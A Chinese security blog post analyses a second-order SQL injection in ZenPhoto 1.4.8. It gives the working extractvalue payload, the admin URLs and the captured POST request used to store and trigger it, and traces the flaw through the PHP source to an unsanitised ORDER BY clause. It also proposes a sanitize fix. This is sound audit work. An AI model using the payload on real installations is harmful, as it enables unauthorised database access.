ZenPhoto 1.4.8 二阶 SQL 注入漏洞

来源:https://www.exploit-db.com/exploits/37602/

背景

ZenPhoto 是一款小巧的相册软件,具备 RSS 输出、FTP 上传方式、Tag、评论回复等功能。基于 PHP+MySQL 环境,它的主旨是简单,这也就是说不管是用户还是网站管理员,都可以很容易的使用它。

关于二阶注入,上一篇文章有写过Second Order SQL Injection

漏洞复现

访问

http://localhost:8888/zenphoto-zenphoto-1.4.8/zp-core/admin-options.php?saved&tab=gallery

找到Sort gallery by字段,设置为Custom,并在custom filed字段后面输入id,extractvalue(0x0a,concat(0x0a,(select version())))%23,最后点Apply

ZenPhoto-1

访问

http://localhost:8888/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?page=upload&tab=http&type=images

如果服务端开启了报错,那么就能在这个页面找到报错消息。当然一般线上服务我们都会关闭掉报错,这也没关系,继续访问

http://localhost:8888/zenphoto-zenphoto-1.4.8/zp-core/admin-logs.php?page=logs

就能看到报错日志了,其中就抛出了数据库版本号

ZenPhoto-1

审计

那么在点Apply的时候,发生了什么呢?我拦下了数据包

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /zenphoto-zenphoto-1.4.8/zp-core/admin-options.php?action=saveoptions HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/zenphoto-zenphoto-1.4.8/zp-core/admin-options.php?saved&tab=gallery
Cookie: zp_user_auth=93a28nygQ7CdX50LI5BdCyNYFJ8qW0wFgyGonO1hD%2FM%3D.7; iweb_safecode=56cfc43b80MDQ3MTMxMDAwMDJlNzEyPGozNTAzNWIxMGJlM2ViNjE5NGo3ND5nNTwxZmAzN2c7OT9jNWI1OjYyPDA1ZjQ2Yw; bdshare_firstime=1463652902675; PHPSESSID=1539753e6d1894d0e9af01be376fa794
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 689
XSRFToken=3c826630e2a936b757048ca5459610812694caba&savegalleryoptions=yes&password_enabled=0&gallery_title_en_US=%E7%9B%B8%E9%A6%86&Gallery_description_en_US=You+can+insert+your+Gallery+description+on+the+Admin+Options+Gallery+tab.&gallery_security=public&user=&pass=&pass=&hint_en_US=&gallery-page_archive=0&gallery-page_contact=0&gallery-page_favorites=0&gallery-page_register=0&gallery-page_index=0&gallery_page_unprotected_contact=1&gallery_page_unprotected_register=1&website_title_en_US=&website_url=&thumbselector=1&gallery_sorttype=custom&customalbumsort=id%2Cextractvalue%280x0a%2Cconcat%280x0a%2C%28select+version%28%29%29%29%29%2523&album_default=1&image_default=1&codeblock1-0=

定位到/zenphoto-zenphoto-1.4.8/zp-core/admin-options.php文件,找到savegalleryoptions相关代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/* * * Gallery options ** */
if (isset($_POST['savegalleryoptions'])) {
    $_zp_gallery->setAlbumPublish((int) isset($_POST['album_default']));
    $_zp_gallery->setImagePublish((int) isset($_POST['image_default']));
    setOption('AlbumThumbSelect', sanitize_numeric($_POST['thumbselector']));
    $_zp_gallery->setThumbSelectImages((int) isset($_POST['thumb_select_images']));
    $_zp_gallery->setSecondLevelThumbs((int) isset($_POST['multilevel_thumb_select_images']));
    $_zp_gallery->setTitle(process_language_string_save('gallery_title', 2));
    $_zp_gallery->setDesc(process_language_string_save('Gallery_description', EDITOR_SANITIZE_LEVEL));
    $_zp_gallery->setWebsiteTitle(process_language_string_save('website_title', 2));
    $web = sanitize($_POST['website_url'], 3);
    $_zp_gallery->setWebsiteURL($web);
    $_zp_gallery->setAlbumUseImagedate((int) isset($_POST['album_use_new_image_date']));
    $st = strtolower(sanitize($_POST['gallery_sorttype'], 3));
    if ($st == 'custom')
        $st = strtolower(sanitize($_POST['customalbumsort'], 3));
    $_zp_gallery->setSortType($st);
    if (($st == 'manual') || ($st == 'random')) {
        $_zp_gallery->setSortDirection(false);
    } else {
        $_zp_gallery->setSortDirection(isset($_POST['gallery_sortdirection']));
    }
    foreach ($_POST as $item => $value) {
        if (strpos($item, 'gallery-page_') === 0) {
            $item = sanitize(substr(postIndexDecode($item), 13));
            $_zp_gallery->setUnprotectedPage($item, (int) isset($_POST['gallery_page_unprotected_' . $item]));
        }
    }
    $_zp_gallery->setSecurity(sanitize($_POST['gallery_security'], 3));
    $notify = processCredentials($_zp_gallery);
    if (zp_loggedin(CODEBLOCK_RIGHTS)) {
        $_zp_gallery->setCodeblock(processCodeblockSave(0));
    }
    $_zp_gallery->save();
    $returntab = "&tab=gallery";
}

定位到gallery_sorttype参数, $st = strtolower(sanitize($_POST['gallery_sorttype'], 3));,留意到这里对$_POST进来的值传到了sanitize函数。该函数的在文件/zenphoto-zenphoto-1.4.8/zp-core/functions-common.php

1
2
3
4
5
6
7
8
9
10
11
function sanitize($input_string, $sanitize_level = 3) {
    if (is_array($input_string)) {
        $output_string = array();
        foreach ($input_string as $output_key => $output_value) {
            $output_string[$output_key] = sanitize($output_value, $sanitize_level);
        }
    } else {
        $output_string = sanitize_string($input_string, $sanitize_level);
    }
    return $output_string;
}

这个函数对传入$input_string先判断是否是数组,如果是,就遍历数组,过滤每个值。如果不是,就直接将$input_string丢入sanitize_string函数去做过滤,最后返回过滤后的值。其实这里有点不严谨,因为如果传入是数组的话,仅仅对value做了过滤,而key是原样保留的,会有安全隐患。我简单改造了下这个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
function sanitize($input_string, $sanitize_level = 3) {
    if (is_array($input_string)) {
        $output_string = array();
        foreach ($input_string as $output_key => $output_value) {
            $output_key = sanitize($output_key, $sanitize_level);
            $output_value = sanitize($output_value, $sanitize_level);
            $output_string[$output_key] = $output_value;
        }
    } else {
        $output_string = sanitize_string($input_string, $sanitize_level);
    }
    return $output_string;
}

继续在该文件里跟踪sanitize_string函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
function sanitize_string($input, $sanitize_level) {
    // Strip slashes if get_magic_quotes_gpc is enabled.
    if (is_string($input)) {
        if (get_magic_quotes_gpc()) {
            $input = stripslashes($input);
        }
        $input = str_replace(chr(0), " ", $input);
        switch ($sanitize_level) {
            case 0:
                return $input;
            case 2:
                // Strips non-style tags.
                $input = sanitize_script($input);
                return ksesProcess($input, getAllowedTags('style_tags'));
            case 3:
                // Full sanitation.  Strips all code.
                return getBare($input);
            case 1:
                // Text formatting sanititation.
                $input = sanitize_script($input);
                return ksesProcess($input, getAllowedTags('allowed_tags'));
            case 4:
            default:
                // for internal use to eliminate security injections
                return sanitize_script($input);
        }
    }
    return $input;
}

这个函数在服务器开启gpc的情况下,会先对参数stripslashes一下,sanitize_level3的情况下,将$input传入了getBare函数,并返回该函数执行结果。跟进getBare函数

1
2
3
4
5
6
7
8
9
function getBare($content) {
  $content = preg_replace('~<script.*?/script>~is', '', $content);
  $content = preg_replace('~<style.*?/style>~is', '', $content);
  $content = preg_replace('~<!--.*?-->~is', '', $content);
  $content = strip_tags($content);
  $content = str_replace('&nbsp;', ' ', $content);
  $content = html_entity_decode($content, ENT_QUOTES, 'UTF-8');
  return $content;
}

可以看到仅仅是替换了一些html标签,并将HTML实体转换为字符,然后就返回内容了,看来做得并不多。

回到savegalleryoptions代码块

1
2
3
4
$st = strtolower(sanitize($_POST['gallery_sorttype'], 3));
if ($st == 'custom')
    $st = strtolower(sanitize($_POST['customalbumsort'], 3));
$_zp_gallery->setSortType($st);

strtolower函数将输入的内容都转换为了小写,$_POST[‘customalbumsort’]的内容也经过了sanitize函数的过滤,最后就调用了_zp_gallerydsetSortType方法,继续跟进,找到_zp_gallery实例

ZenPhoto-1

$_zp_gallery即为Gallery类的一个实例,定义了一些protected变量

ZenPhoto-1

可以看到setSortType函数直接把参数传递给了set函数,在文件中找到set函数的定义

1
2
3
function set($field, $value) {
        $this->data[$field] = $value;
}

这里将参数值赋值给了受保护的变量$data,接下来继续回到savegalleryoptions代码块

1
2
$_zp_gallery->save();
$returntab = "&tab=gallery";

$_zp_gallery实例调用了save方法,从Gallery类中找到save方法,将$this->data值serialize序列化后传递给了setOption函数

1
2
3
function save() {
    setOption('gallery_data', serialize($this->data));
}

跟进setOption函数,在文件/zenphoto-zenphoto-1.4.8/zp-core/functions-basic.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
function setOption($key, $value, $persistent = true, $creator = NULL) {
    global $_zp_options;
    if ($persistent) {
        $sql = 'INSERT INTO ' . prefix('options') . ' (`name`,`ownerid`,`theme`,`value`,`creator`) VALUES (' . db_quote($key) . ',0,"",';
        $sqlu = ' ON DUPLICATE KEY UPDATE `value`=';
        if (is_null($value)) {
            $sql .= 'NULL';
            $sqlu .= 'NULL';
        } else {
            $sql .= db_quote($value);
            $sqlu .= db_quote($value);
        }
  if (is_null($creator)) {
            $sql .= ',NULL';
        } else {
            $sql .= ','.db_quote($creator);
        }
        $sql .= ') ' . $sqlu;
        $result = query($sql, false);
    } else {
        $result = true;
    }
    if ($result) {
        $_zp_options[strtolower($key)] = $value;
        return true;
    } else {
        return false;
    }
}

这里我们传入$keygallery_data$value是序列化后的$this->data,从代码中可以看到这两个在INSERT INTO前都要经过db_quote函数处理,跟进db_quote,我本地选择的mysqli扩展,所以定位到此文件/zenphoto-zenphoto-1.4.8/zp-core/functions-db-MySQLi.php

1
2
3
4
function db_quote($string) {
    global $_zp_DB_connection;
    return "'" . $_zp_DB_connection->real_escape_string($string) . "'";
}

这里的$_zp_DB_connection即为我mysqli连接串,接着$_zp_DB_connection->real_escape_string($string)其实是一种面向对象的写法,面向过程的写法是这样的string mysqli_real_escape_string ( mysqli $link , string $escapestr ),官方文档里有说明该函数过滤哪些字符。

ZenPhoto-1

看来db_quote还是有用的,毕竟单双引号都被干掉了,所以这个输入点的是无法构造出带单双引号的payload的,回到漏洞复现的步骤,当时填入的payloadid,extractvalue(0x0a,concat(0x0a,(select version())))%23,这个payload是不受到过滤函数影响的,从数据库也可以看到payload被完整的插入进去了

ZenPhoto-1

到这里可以看到该二阶注入的第一步已经成功了,下面继续分析

访问

http://localhost:8888/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?page=upload&tab=http&type=images

能触发漏洞,找到相关位置,/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php,66行

genAlbumList($albumlist);

找到该函数实现的位置,文件/zenphoto-zenphoto-1.4.8/zp-core/admin-functions.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
function genAlbumList(&$list, $curAlbum = NULL, $rights = UPLOAD_RIGHTS) {
    global $_zp_gallery;
    if (is_null($curAlbum)) {
        $albums = array();
        $albumsprime = $_zp_gallery->getAlbums(0);
        foreach ($albumsprime as $album) { // check for rights
            $albumobj = newAlbum($album);
            if ($albumobj->isMyItem($rights)) {
                $albums[] = $album;
            }
        }
    } else {
        $albums = $curAlbum->getAlbums(0);
    }
    if (is_array($albums)) {
        foreach ($albums as $folder) {
            $album = newAlbum($folder);
            if ($album->isDynamic()) {
                if ($rights == ALL_ALBUMS_RIGHTS) {
                    $list[$album->getFileName()] = $album->getTitle();
                }
            } else {
                $list[$album->getFileName()] = $album->getTitle();
                genAlbumList($list, $album, $rights); /* generate for subalbums */
            }
        }
    }
}

$albumsprime = $_zp_gallery->getAlbums(0);,这里有个我们熟悉的类实例$_zp_gallery,跟进
/zenphoto-zenphoto-1.4.8/zp-core/class-gallery.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
function getAlbums($page = 0, $sorttype = null, $direction = null, $care = true, $mine = NULL) {
// Have the albums been loaded yet?
    if ($mine || is_null($this->albums) || $care && $sorttype . $direction !== $this->lastalbumsort) {
        $albumnames = $this->loadAlbumNames();
        $key = $this->getAlbumSortKey($sorttype);
        $albums = $this->sortAlbumArray(NULL, $albumnames, $key, $direction, $mine);
// Store the values
        $this->albums = $albums;
        $this->lastalbumsort = $sorttype . $direction;
    }
    if ($page == 0) {
        return $this->albums;
    } else {
        return array_slice($this->albums, galleryAlbumsPerPage() * ($page - 1), galleryAlbumsPerPage());
    }
}

$sorttype变量值为NULL,注意这里的$key参数,这个就是被我们污染了的变量,跟进下getAlbumSortKey的由来,/zenphoto-zenphoto-1.4.8/zp-core/class-gallery.php

1
2
3
4
5
6
function getAlbumSortKey($sorttype = null) {
    if (empty($sorttype)) {
        $sorttype = $this->getSortType();
    }
    return lookupSortKey($sorttype, 'sort_order', 'albums');
}

由于传入的$sorttypeNULL,所以进入了if判断,调用getSortType函数去了,跟进
/zenphoto-zenphoto-1.4.8/zp-core/class-gallery.php

1
2
3
4
function getSortType() {
    $type = $this->get('gallery_sorttype');
    return $type;
}

这里回去调用get方法,并返回结果,所以找get方法去

1
2
3
4
5
6
function get($field) {
    if (isset($this->data[$field])) {
        return $this->data[$field];
    }
    return NULL;
}

这里传入一个$field,会返回$this->data值,而这个$this->data在构造函数中的实现为
/zenphoto-zenphoto-1.4.8/zp-core/class-gallery.php

1
2
3
4
5
6
7
8
9
10
11
12
13
function __construct() {
// Set our album directory
    $this->albumdir = ALBUM_FOLDER_SERVERPATH;
    $data = getOption('gallery_data');
    if ($data) {
        $this->data = getSerializedArray($data);
    }
    if (isset($this->data['unprotected_pages'])) {
        $pages = getSerializedArray($this->data['unprotected_pages']);
        if (is_array($pages))
            $this->unprotected_pages = $pages; //    protect against a failure
    }
}

跟进getOption函数
/zenphoto-zenphoto-1.4.8/zp-core/functions-basic.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
function getOption($key) {
    global $_zp_conf_vars, $_zp_options;
    $key = strtolower($key);
    if (is_null($_zp_options) && function_exists('query_full_array')) { // may be too early to use database!
        // option table not yet loaded, load it (but not the theme options!)
        $sql = "SELECT `name`, `value` FROM " . prefix('options') . ' WHERE (`theme`="" OR `theme` IS NULL) AND `ownerid`=0';
        $optionlist = query_full_array($sql, false);
        if ($optionlist !== false) {
            $_zp_options = array();
            foreach ($optionlist as $option) {
                $_zp_options[strtolower($option['name'])] = $option['value'];
            }
        }
    }
    if (isset($_zp_options[$key])) {
        return $_zp_options[$key];
    } else {
        return NULL;
    }
}

它会去数据库的options表里面去取对应$key字段的value并返回,而我们传入的$key=gallery_data,得到value字段值为

a:21:{s:21:"gallery_sortdirection";i:0;s:16:"gallery_sorttype";s:56:"id,extractvalue(0x0a,concat(0x0a,(select version())))%23";s:13:"gallery_title";s:31:"a:1:{s:5:"en_US";s:6:"相馆";}";s:19:"Gallery_description";s:99:"a:1:{s:5:"en_US";s:73:"You can insert your Gallery description on the Admin Options Gallery tab.";}";s:16:"gallery_password";N;s:12:"gallery_user";N;s:12:"gallery_hint";N;s:10:"hitcounter";N;s:13:"current_theme";s:7:"default";s:13:"website_title";s:0:"";s:11:"website_url";s:0:"";s:16:"gallery_security";s:6:"public";s:16:"login_user_field";N;s:24:"album_use_new_image_date";i:0;s:19:"thumb_select_images";i:0;s:17:"unprotected_pages";s:43:"a:2:{i:0;s:8:"register";i:1;s:7:"contact";}";s:13:"album_publish";i:1;s:13:"image_publish";i:1;s:30:"multilevel_thumb_select_images";i:0;s:14:"sort_direction";i:0;s:9:"codeblock";s:6:"a:0:{}”;}

ZenPhoto-1

回到构造函数,这个值赋值给$data,然后传入getSerializedArray函数,跟进一下
/zenphoto-zenphoto-1.4.8/zp-core/functions-common.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function getSerializedArray($string) {
    if (is_array($string)) {
        return $string;
    }
    if (preg_match('/^a:[0-9]+:{/', $string)) {
        $r = @unserialize($string);
        if ($r) {
            return $r;
        } else {
            return array();
        }
    } else if (strlen($string) == 0 && !is_bool($string)) {
        return array();
    } else {
        return array($string);
    }
}

这里就是做一下简单的反序列化处理,以数组形式将结果返回。

这样就得到$this->data[‘gallery_sorttype’]的值id,extractvalue(0x0a,concat(0x0a,(select version())))%23,也就是$sorttype的值为id,extractvalue(0x0a,concat(0x0a,(select version())))%23,即$key的值。

接下来又调用了sortAlbumArray函数,找到该函数
/zenphoto-zenphoto-1.4.8/zp-core/class-gallery.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
function sortAlbumArray($parentalbum, $albums, $sortkey = '`sort_order`', $sortdirection = NULL, $mine = NULL) {
    if (count($albums) == 0) {
        return array();
    }
    if (is_null($mine) && zp_loggedin(MANAGE_ALL_ALBUM_RIGHTS)) {
        $mine = true;
    }
    if (is_null($parentalbum)) {
        $albumid = ' IS NULL';
        $obj = $this;
        $viewUnpublished = $mine;
    } else {
        $albumid = '=' . $parentalbum->getID();
        $obj = $parentalbum;
        $viewUnpublished = (zp_loggedin() && $obj->albumSubRights() & (MANAGED_OBJECT_RIGHTS_EDIT | MANAGED_OBJECT_RIGHTS_VIEW));
    }
    if (($sortkey == '`sort_order`') || ($sortkey == 'RAND()')) { // manual sort is always ascending
        $order = false;
    } else {
        if (!is_null($sortdirection)) {
            $order = strtoupper($sortdirection) == 'DESC';
        } else {
            $order = $obj->getSortDirection('album');
        }
    }
    $sql = 'SELECT * FROM ' . prefix("albums") . ' WHERE `parentid`' . $albumid . ' ORDER BY ' . $sortkey . ' ' . $sortdirection;
    $result = query($sql);
    $results = array();
//    check database aganist file system
    while ($row = db_fetch_assoc($result)) {
        $folder = $row['folder'];
        if (($key = array_search($folder, $albums)) !== false) { // album exists in filesystem
            $results[$row['folder']] = $row;
            unset($albums[$key]);
        } else { // album no longer exists
            $id = $row['id'];
            query("DELETE FROM " . prefix('albums') . " WHERE `id`=$id"); // delete the record
            query("DELETE FROM " . prefix('comments') . " WHERE `type` ='images' AND `ownerid`= '$id'"); // remove image comments
            query("DELETE FROM " . prefix('obj_to_tag') . "WHERE `type`='albums' AND `objectid`=" . $id);
            query("DELETE FROM " . prefix('albums') . " WHERE `id` = " . $id);
        }
    }
    db_free_result($result);
    foreach ($albums as $folder) { // these albums are not in the database
        $albumobj = newAlbum($folder);
        if ($albumobj->exists) { // fail to instantiate?
            $results[$folder] = $albumobj->getData();
        }
    }
//    now put the results in the right order
    $results = sortByKey($results, $sortkey, $order);
//    albums are now in the correct order
    $albums_ordered = array();
    foreach ($results as $row) { // check for visible
        $folder = $row['folder'];
        $album = newAlbum($folder);
        switch (checkPublishDates($row)) {
            case 1:
                $album->setShow(0);
                $album->save();
            case 2:
                $row['show'] = 0;
        }
        if ($mine || $row['show'] || (($list = $album->isMyItem(LIST_RIGHTS)) && is_null($album->getParent())) || (is_null($mine) && $list && $viewUnpublished)) {
            $albums_ordered[] = $folder;
        }
    }
    return $albums_ordered;
}

至此,二阶注入的第二步分析完,完整的过程就是这样,最后看下mysql的执行log,之前存入的payload被执行了即触发了漏洞。

ZenPhoto-1

总结

正如exploit-db上所说的,ZenPhoto1.4.8存在很多处二阶注入的地方。本质上仍然是在对用户可控的输入点过滤不够,过分依赖系统函数。

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    2、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: true
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Wismartzy, <br>毕业于杭电, 从事安全行业<br><br>增肥计划进行中